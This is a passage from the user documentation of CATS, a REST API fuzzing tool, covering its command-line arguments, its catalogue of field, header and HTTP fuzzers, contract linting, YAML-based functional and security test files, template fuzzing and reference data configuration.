CATS also supports JUNIT output. The output will be a single testsuite that will incorporate all tests grouped by Fuzzer name. As the JUNIT format does not have the concept of warning the following mapping is used:

  • CATS error is reported as JUNIT error
  • JUNIT failure is not used at all
  • CATS warn is reported as JUNIT skipped
  • CATS skipped is reported as JUNIT disabled

The JUNIT report is written as junit.xml in the cats-report folder. Individual tests, both as .html and .json will also be created.

Slicing Strategies for Running Cats

CATS has a significant number of Fuzzers. Currently, 89 and growing. Some of the Fuzzers are executing multiple tests for every given field within the request. For example the ControlCharsOnlyInFieldsFuzzer has 63 control chars values that will be tried for each request field. If a request has 15 fields for example, this will result in 1020 tests. Considering that there are additional Fuzzers with the same magnitude of tests being generated, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes, rather than seconds).

Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.

Split by Endpoints

You can use the --paths=PATH argument to run CATS sequentially for each path.

Split by Fuzzer Category

You can use the --checkXXX arguments to run CATS only with specific Fuzzers like: --checkHttp, -checkFields, etc.

Split by Fuzzer Type

You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2 or -skipFuzzers=Fuzzer1,Fuzzer2 to either include or exclude specific Fuzzers. For example, you can run all Fuzzers except for the ControlChars and Whitespaces ones like this: --skipFuzzers=ControlChars,Whitesspaces. This will skip all Fuzzers containing these strings in their name. After, you can create an additional run only with these Fuzzers: --fuzzers=ControlChars,Whitespaces.

These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.

Please note that due to the fact that ControlChars, Emojis and Whitespaces generate huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars, --includeWhitespaces and/or --includeEmojis arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.

Ignoring Specific HTTP Responses

By default, CATS will report WARNs and ERRORs according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and report those cases as success instead or WARN or ERROR. For example, if you want CATS to report ERRORs only when there is an Exception or the service returns a 500, you can use this: --ignoreResultCodes="2xx,4xx".

Ignoring Undocumented Response Code Checks

You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code, based on the scenario under test and will report and WARN the service returns the expected response code, but the response code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking expected response code inside the contract) using the --ignoreResponseCodeUndocumentedCheck argument. CATS with now report these cases as SUCCESS instead of WARN.

Ignoring Response Body Checks

Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report an WARN if not matching. You can make CATS ignore the response body checks using the --ingoreResponseBodyCheck argument. CATS with now report these cases as SUCCESS instead of WARN.

Replaying Tests

When CATS runs, for each test, it will export both an HTML file that will be linked in the final report and individual JSON files. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it in a bug report for example.

The syntax for replaying tests is the following:

> cats replay "Test1,Test233,Test15.json,dir/Test19.json"

Some notes on the above example:

  • test names can be separated by comma ,
  • if you provide a json extension to a test name, that file will be search as a path i.e. it will search for Test15.json in the current folder and Test19.json in the dir folder
  • if you don't provide a json extension to a test name, it will search for that test in the cats-report folder i.e. cats-report/Test1.json and cats-report/Test233.json

Available Commands

To list all available commands, run:

> cats -h

All available subcommands are listed below:

  • > cats help or cats -h will list all available options

  • > cats list --fuzzers will list all the existing fuzzers, grouped on categories

  • > cats list --fieldsFuzzingStrategy will list all the available fields fuzzing strategies

  • > cats list --paths --contract=CONTRACT will list all the paths available within the contract

  • > cats replay "test1,test2" will replay the given tests test1 and test2

  • > cats fuzz will fuzz based on a given request template, rather than an OpenAPI contract

  • > cats run will run functional and targeted security tests written in the CATS YAML format

  • > cats lint will run OpenAPI contract linters, also called ContractInfoFuzzers

Available arguments

  • --contract=LOCATION_OF_THE_CONTRACT supplies the location of the OpenApi or Swagger contract.
  • --server=URL supplies the URL of the service implementing the contract.
  • --basicauth=USR:PWD supplies a username:password pair, in case the service uses basic auth.
  • --fuzzers=LIST_OF_FUZZERS supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS which check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.
  • --log=PACKAGE:LEVEL can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug or suppress CATS logging: --log=com.endava.cats:warn
  • --paths=PATH_LIST supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.
  • --skipPaths=PATH_LIST a comma separated list of paths to ignore. If no path is supplied, no path will be ignored
  • --fieldsFuzzingStrategy=STRATEGY specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE, SIZE and POWERSET. More information on field fuzzing can be found in the sections below.
  • --maxFieldsToRemove=NUMBER specifies the maximum number of fields to be removed when using the SIZE fields fuzzing strategy.
  • --refData=FILE specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.
  • --headers=FILE specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.
  • --edgeSpacesStrategy=STRATEGY specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate and validateAndTrim.
  • --sanitizationStrategy=STRATEGY specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate and validateAndSanitize
  • --urlParams A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).
  • --functionalFuzzerFile a file used by the FunctionalFuzzer that will be used to create user-supplied payloads.
  • --skipFuzzers=LIST_OF_FIZZERs a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer names (for example: --skippedFuzzers=VeryLargeStringsFuzzer) or partial Fuzzer names (for example: --skipFuzzers=VeryLarge). CATS will check if the Fuzzer names contains the string you provide in the arguments value.
  • --skipFields=field1,field2#subField1 a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.
  • --httpMethods=PUT,POST,etc a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract
  • --securityFuzzerFile A file used by the SecurityFuzzer that will be used to inject special strings in order to exploit possible vulnerabilities
  • --printExecutionStatistics If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
  • --timestampReports If supplied (no value needed), it will output the report still inside the cats-report folder, but in a sub-folder with the current timestamp
  • --reportFormat=FORMAT Specifies the format of the CATS report. Supported formats: HTML_ONLY, HTML_JS or JUNIT. You can use HTML_ONLY if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS which includes some sorting and filtering capabilities.
  • --useExamples If true (default value when not supplied) then CATS will use examples supplied in the OpenAPI contact. If false CATS will rely only on generated values
  • --checkFields If supplied (no value needed), it will only run the Field Fuzzers
  • --checkHeaders If supplied (no value needed), it will only run the Header Fuzzers
  • --checkHttp If supplied (no value needed), it will only run the HTTP Fuzzers
  • --includeWhitespaces If supplied (no value needed), it will include the Whitespaces Fuzzers
  • --includeEmojis If supplied (no value needed), it will include the Emojis Fuzzers
  • --includeControlChars If supplied (no value needed), it will include the ControlChars Fuzzers
  • --includeContract If supplied (no value needed), it will include ContractInfoFuzzers
  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key from the sslKeystore
  • --proxyHost The proxy server's host name (if running behind proxy)
  • --proxyPort The proxy server's port number (if running behind proxy)
  • --maxRequestsPerMinute Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000
  • --connectionTimeout Time period in seconds which CATS should establish a connection with the server; default is 10 seconds
  • --writeTimeout Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds
  • --readTimeout Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds
  • --dryRun If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint
  • --ignoreResponseCodes HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx, 4xx, etc. If provided, all Contract Fuzzers will be skipped.
  • --ignoreResponseSize SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseWords COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseLines LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseRegex a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --tests TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder
  • --ignoreResponseCodeUndocumentedCheck If supplied (not value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN
  • --ignoreResponseBodyCheck If supplied (not value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN
  • --blackbox If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
  • --contentType A custom mime type if the OpenAPI spec uses content type negotiation versioning.
  • --outoput The path where the CATS report will be written. Default is cats-report in the current directory
  • --skipReportingForIgnoredCodes Skip reporting entirely for the any ignored arguments provided in --ignoreResponseXXX
> cats --contract=my.yml --server=https://locathost:8080 --checkHeaders

This will run CATS against http://localhost:8080 using my.yml as an API spec and will only run the HTTP headers Fuzzers.

Available Fuzzers

To get a list of fuzzers run cats list --fuzzers. A list of all available fuzzers will be returned, along with a short description for each.

There are multiple categories of Fuzzers available:

  • Field Fuzzers which target request body fields or path parameters
  • Header Fuzzers which target HTTP headers
  • HTTP Fuzzers which target just the interaction with the service (without fuzzing fields or headers)

Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as Fuzzers:

  • ContractInfo Fuzzers which checks the contract for API good practices
  • Special Fuzzers a special category which need further configuration and are focused on more complex activities like functional flow, security testing or supplying your own request templates, rather than OpenAPI specs

Field Fuzzers

CATS has currently 42 registered Field Fuzzers:

  • BooleanFieldsFuzzer - iterate through each Boolean field and send random strings in the targeted field
  • DecimalFieldsLeftBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the left side in the targeted field
  • DecimalFieldsRightBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the right side in the targeted field
  • DecimalValuesInIntegerFieldsFuzzer - iterate through each Integer field and send requests with decimal values in the targeted field
  • EmptyStringValuesInFieldsFuzzer - iterate through each field and send requests with empty String values in the targeted field
  • ExtremeNegativeValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted field
  • ExtremeNegativeValueIntegerFieldsFuzzer - iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted field
  • ExtremePositiveValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted field
  • ExtremePositiveValueInIntegerFieldsFuzzer - iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted field
  • IntegerFieldsLeftBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the left side in the targeted field
  • IntegerFieldsRightBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the right side in the targeted field
  • InvalidValuesInEnumsFieldsFuzzer - iterate through each ENUM field and send invalid values
  • LeadingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted field
  • LeadingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted field
  • LeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with single code points emojis
  • LeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with multi code points emojis
  • MaxLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have maxLength declared and send requests with values matching the maxLength size/value in the targeted field
  • MaximumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have maximum declared and send requests with values matching the maximum size/value in the targeted field
  • MinLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have minLength declared and send requests with values matching the minLength size/value in the targeted field
  • MinimumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have minimum declared and send requests with values matching the minimum size/value in the targeted field
  • NewFieldsFuzzer - send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'
  • NullValuesInFieldsFuzzer - iterate through each field and send requests with null values in the targeted field
  • OnlyControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send values with control chars only
  • OnlyWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send values with unicode separators only
  • OnlySingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with single code point emojis only
  • OnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with multi code point emojis only
  • RemoveFieldsFuzzer - iterate through each request fields and remove certain fields according to the supplied 'fieldsFuzzingStrategy'
  • StringFieldsLeftBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the left side in the targeted field
  • StringFieldsRightBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the right side in the targeted field
  • StringFormatAlmostValidValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are almost valid (i.e. email@yhoo. for email, 888.1.1. for ip, etc) in the targeted field
  • StringFormatTotallyWrongValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted field
  • StringsInNumericFieldsFuzzer - iterate through each Integer (int, long) and Number field (float, double) and send requests having the fuzz string value in the targeted field
  • TrailingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode whitespaces and invisible separators in the targeted field
  • TrailingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode control chars in the targeted field
  • TrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with single code point emojis
  • TrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with multi code point emojis
  • VeryLargeStringsFuzzer - iterate through each String field and send requests with very large values (40000 characters) in the targeted field
  • WithinControlCharsInFieldsSanitizeValidateFuzzer - iterate through each field and send values containing unicode control chars
  • WithinSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing single code point emojis
  • WithinMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing multi code point emojis
  • ZalgoTextInStringFieldsValidateSanitizeFuzzer - iterate through each field and send values containing zalgo text

You can run only these Fuzzers by supplying the --checkFields argument.

Header Fuzzers

CATS has currently 28 registered Header Fuzzers:

  • AbugidasCharsInHeadersFuzzer - iterate through each header and send requests with abugidas chars in the targeted header
  • CheckSecurityHeadersFuzzer - check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]
  • DummyAcceptHeadersFuzzer - send a request with a dummy Accept header and expect to get 406 code
  • DummyContentTypeHeadersFuzzer - send a request with a dummy Content-Type header and expect to get 415 code
  • DuplicateHeaderFuzzer - send a 'happy' flow request and duplicate an existing header
  • EmptyStringValuesInHeadersFuzzer - iterate through each header and send requests with empty String values in the targeted header
  • ExtraHeaderFuzzer - send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'
  • LargeValuesInHeadersFuzzer - iterate through each header and send requests with large values in the targeted header
  • LeadingControlCharsInHeadersFuzzer - iterate through each header and prefix values with control chars
  • LeadingWhitespacesInHeadersFuzzer - iterate through each header and prefix value with unicode separators
  • LeadingSpacesInHeadersFuzzer - iterate through each header and send requests with spaces prefixing the value in the targeted header
  • RemoveHeadersFuzzer - iterate through each header and remove different combinations of them
  • OnlyControlCharsInHeadersFuzzer - iterate through each header and replace value with control chars
  • OnlySpacesInHeadersFuzzer - iterate through each header and replace value with spaces
  • OnlyWhitespacesInHeadersFuzzer - iterate through each header and replace value with unicode separators
  • TrailingSpacesInHeadersFuzzer - iterate through each header and send requests with trailing spaces in the targeted header \
  • TrailingControlCharsInHeadersFuzzer - iterate through each header and trail values with control chars
  • TrailingWhitespacesInHeadersFuzzer - iterate through each header and trail values with unicode separators
  • UnsupportedAcceptHeadersFuzzer - send a request with an unsupported Accept header and expect to get 406 code
  • UnsupportedContentTypesHeadersFuzzer - send a request with an unsupported Content-Type header and expect to get 415 code
  • ZalgoTextInHeadersFuzzer - iterate through each header and send requests with zalgo text in the targeted header

You can run only these Fuzzers by supplying the --checkHeaders argument.

HTTP Fuzzers

CATS has currently 6 registered HTTP Fuzzers:

  • BypassAuthenticationFuzzer - check if an authentication header is supplied; if yes try to make requests without it
  • DummyRequestFuzzer - send a dummy json request {'cats': 'cats'}
  • HappyFuzzer - send a request with all fields and headers populated
  • HttpMethodsFuzzer - iterate through each undocumented HTTP method and send an empty request
  • MalformedJsonFuzzer - send a malformed json request which has the String 'bla' at the end
  • NonRestHttpMethodsFuzzer - iterate through a list of HTTP method specific to the WebDav protocol that are not expected to be implemented by REST APIs

You can run only these Fuzzers by supplying the --checkHttp argument.

ContractInfo Fuzzers or OpenAPI Linters

Usually a good OpenAPI contract must follow several good practices in order to make it easy digestible by the service clients and act as much as possible as self-sufficient documentation:

  • follow good practices around naming the contract elements like paths, requests, responses
  • always use plural for the path names, separate paths words through hyphens/underscores, use camelCase or snake_case for any json types and properties
  • provide tags for all operations in order to avoid breaking code generation on some languages and have a logical grouping of the API operations
  • provide good description for all paths, methods and request/response elements
  • provide meaningful responses for POST, PATCH and PUT requests
  • provide examples for all requests/response elements
  • provide structural constraints for (ideally) all request/response properties (min, max, regex)
  • heaver some sort of CorrelationIds/TraceIds within headers
  • have at least a security schema in place
  • avoid having the API version part of the paths
  • document response codes for both "happy" and "unhappy" flows
  • avoid using xml payload unless there is a really good reason (like documenting an old API for example)
  • json types and properties do not use the same naming (like having a Pet with a property named pet)

CATS has currently 9 registered ContractInfo Fuzzers:

  • HttpStatusCodeInValidRangeFuzzer - verifies that all HTTP response codes are within the range of 100 to 599
  • NamingsContractInfoFuzzer - verifies that all OpenAPI contract elements follow REST API naming good practices
  • PathTagsContractInfoFuzzer - verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top level
  • RecommendedHeadersContractInfoFuzzer - verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.
  • RecommendedHttpCodesContractInfoFuzzer - verifies that the current path contains all recommended HTTP response codes for all operations
  • SecuritySchemesContractInfoFuzzer - verifies if the OpenApi contract contains valid security schemas for all paths, either globally configured or per path
  • TopLevelElementsContractInfoFuzzer - verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.
  • VersionsContractInfoFuzzer - verifies that a given path doesn't contain versioning information
  • XmlContentTypeContractInfoFuzzer - verifies that all OpenAPI contract paths responses and requests does not offer application/xml as a Content-Type

You can run only these Fuzzers using > cats lint --contract=CONTRACT.

Special Fuzzers

FunctionalFuzzer

Writing Custom Tests

You can leverage CATS super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so called FunctionaFuzzer, which is not a Fuzzer per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions, assertions as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payload, you only need to override values for specific fields. The rest of the information will be populated by CATS using valid data, just like a 'happy' flow request.

It's important to note that reference data won't get replaced when using the FunctionalFuzzer. So if there are reference data fields, you must also supply those in the FunctionalFuzzer.

The FunctionalFuzzer will only trigger if a valid functionalFuzzer.yml file is supplied. The file has the following syntax:

/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: value
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_NETHOD

And a typical run will look like:

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080

This is a description of the elements within the functionalFuzzer.yml file:

  • you can supply a description of the test. This will be set as the Scenario description. If you don't supply a description the testNumber will be used instead.
  • you can have multiple tests under the same path: test1, test2, etc.
  • expectedResponseCode is mandatory, otherwise the Fuzzer will ignore this test. The expectedResponseCode tells CATS what to expect from the service when sending this test.
  • at most one of the properties can have multiple values. When this situation happens, that test will actually become a list of tests one for each of the values supplied. For example in the above example prop7 has 3 values. This will actually result in 3 tests, one for each value.
  • test within the file are executed in the declared order. This is why you can have outputs from one test act as inputs for the next one(s) (see the next section for details).
  • if the supplied httpMethod doesn't exist in the OpenAPI given path, a warning will be issued and no test will be executed
  • if the supplied httpMethod is not a valid HTTP method, a warning will be issued and no test will be executed
  • if the request payload uses a oneOf element to allow multiple request types, you can control which of the possible types the FunctionalFuzzer will apply to using the oneOfSelection keyword. The value of the oneOfSelection keyword must match the fully qualified name of the discriminator.
  • if no oneOfSelection is supplied, and the request payload accepts multiple oneOf elements, than a custom test will be created for each type of payload
  • the file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of .

Dealing with oneOf, anyOf

When you have request payloads which can take multiple object types, you can use the oneOfSelection keyword to specify which of the possible object types is required by the FunctionalFuzzer. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator.

Correlating Tests

As CATs mostly relies on generated data with small help from some reference data, testing complex business scenarios with the pre-defined Fuzzers is not possible. Suppose we have an endpoint that creates data (doing a POST), and we want to check its existence (via GET). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer. The functionalFuzzerFile can have an output entry where you can state a variable name, and its fully qualified name from the response in order to set its value. You can then refer the variable using ${variable_name} from another test in order to use its value.

Here is an example:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
/pet/{id}:
test_2:
description: Get a Pet
id: ${petId}
expectedResponseCode: 200

Suppose the test_1 execution outputs:

{
"pet":
{
"id" : 2
}
}

When executing test_1 the value of the pet id will be stored in the petId variable (value 2). When executing test_2 the id parameter will be replaced with the petId variable (value 2) from the previous case.

Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.

Verifying responses

The FunctionalFuzzer can verify more than just the expectedResponseCode. This is achieved using the verify element. This is an extended version of the above functionalFuzzer.yml file.

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
verify:
pet#name: "Baby"
pet#id: "[0-9]+"
/pet/{id}:
test_2:
description: Get a Pet
id: ${petId}
expectedResponseCode: 200

Considering the above file:

  • the FunctionalFuzzer will check if the response has the 2 elements pet#name and pet#id
  • if the elements are found, it will check that the pet#name has the Baby value and that the pet#id is numeric

The following json response will pass test_1:

{
"pet":
{
"id" : 2,
"name": "Baby"
}
}

But this one won't (pet#name is missing):

{
"pet":
{
"id" : 2
}
}

You can also refer to request fields in the verify section by using the ${request#..} qualifier. Using the above example, by having the following verify section:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
verify:
pet#name: "${request#name}"
pet#id: "[0-9]+"

It will verify if the response contains a pet#name element and that its value equals My Pet as sent in the request.

Some notes:

  • verify parameters support Java regexes as values
  • you can supply more than one parameter to check (as seen above)
  • if at least one of the parameters is not present in the response, CATs will report an error
  • if all parameters are found and have valid values, but the response code is not matched, CATs will report a warning
  • if all the parameters are found and match their values, and the response code is as expected, CATs will report a success

Working with additionalProperties in FunctionalFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

FunctionalFuzzer Reserved keywords

The following keywords are reserved in FunctionalFuzzer tests: output, expectedResponseCode, httpMethod, description, oneOfSelection, verify, additionalProperties, topElement and mapValues.

Security Fuzzer

Although CATs is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the FunctionalFuzzer. You can use the exact same elements for output variables, test correlation, verify responses and so forth, with the addition that you must also specify a targetFields and/or targetFieldTypes and a stringsList element. A typical securityFuzzerFile will look like this:

/pet:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFields:
- pet#id
- pet#description
stringsFile: xss.txt

And a typical run:

> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080

You can also supply output, httpMethod, oneOfSelection and/or verify (with the same behaviour as within the FunctionalFuzzer) if they are relevant to your case.

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example instead of ..

This is what the SecurityFuzzer will do after parsing the above securityFuzzerFile:

  • it will add the fixed value "My Pet" to all the request for the field name
  • for each field specified in the targetFields i.e. pet#id and pet#description it will create requests for each line from the xss.txt file and supply those values in each field
  • if you consider the xss.txt sample file included in the CATs repo, this means that it will send 21 requests targeting pet#id and 21 requests targeting pet#description i.e. a total of 42 tests
  • for each of these 42 tests, the SecurityFuzzer will expect a 200 response code. If another response code is returned, then CATs will report the test as error.

If you want the above logic to apply to all paths, you can use all as the path name:

all:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFields:
- pet#id
- pet#description
stringsFile: xss.txt

Instead of specifying the field names, you can broader to scope to target certain fields types. For example, if we want to test for XSS in all string fields, you can have the following securityFuzzerFile:

all:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFieldTypes:
- string
stringsFile: xss.txt

As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a sql_injection.txt, a xss.txt, a command_injection.txt and so on. For each of these files, you can create a test entry in the securityFuzzerFile where you include the fields you think are meaningful for these types of tests. (It was a deliberate choice (for now) to not include all fields by default.) The expectedResponseCode should be tweaked according to your particular context. Your service might sanitize data before validation, so might be perfectly valid to expect a 200 or might validate the fields directly, so might be perfectly valid to expect a 400. A 500 will usually mean something was not handled properly and might signal a possible bug.

Working with additionalProperties in SecurityFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

SecurityFuzzer Reserved keywords

The following keywords are reserved in SecurityFuzzer tests: output, expectedResponseCode, httpMethod, description, verify, oneOfSelection, targetFields, targetFieldTypes, stringsFile, additionalProperties, topElement and mapValues.

TemplateFuzzer

The TemplateFuzzer can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the TemplateFuzzer is as follows (very similar to curl:

> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url 

The command will:

  • send a POST request to http://service-url
  • use the {"field1":"value1","field2":"value2","field3":"value3"} as a template
  • replace one by one field1,field2,header with fuzz data and send each request to the service endpoint
  • ignore 2XX,4XX response codes and report an error when the received response code is not in this list

It was a deliberate choice to limit the fields for which the Fuzzer will run by supplying them using the -t argument. For nested objects, supply fully qualified names: field.subfield.

Headers can also be fuzzed using the same mechanism as the fields.

This Fuzzer will send the following type of data:

  • null values
  • empty values
  • zalgo text
  • abugidas characters
  • large random unicode data
  • very large strings (80k characters)
  • single and multi code point emojis
  • unicode control characters
  • unicode separators
  • unicode whitespaces

For a full list of options run > cats fuzz -h.

You can also supply your own dictionary of data using the -w file argument.

HTTP methods with bodies will only be fuzzed at the request payload and headers level.

HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d argument.

This is an example for a GET request:

> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" http://service-url/paths1?query1=test&query2

Reference Data File

There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:

/path/0.1/auth:
prop#subprop: 12
prop2: 33
prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
prop#test: 1

For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer. Consider this request payload:

{
"address": {
"phone": "123",
"postCode": "408",
"street": "cool street"
},
"name": "Joe"
}

and the following reference data file file:

/path/0.1/auth:
address#street: "My Street"
name: "John"

This will result in any fuzzed request to the /path/0.1/auth endpoint being updated to contain the supplied fixed values:

{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John"
}

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of ..

You can use environment (system) variables in a ref data file using: $$VARIABLE_NAME. (notice double $$)

Setting additionalProperties

As additional properties are maps i.e. they don't actually have a structure, CATS cannot currently generate valid values. If the elements within such a data structure are essential for a request, you can supply them via the refData file using the following syntax:

/path/0.1/auth:
address#street: "My Street"
name: "John"
additionalProperties:
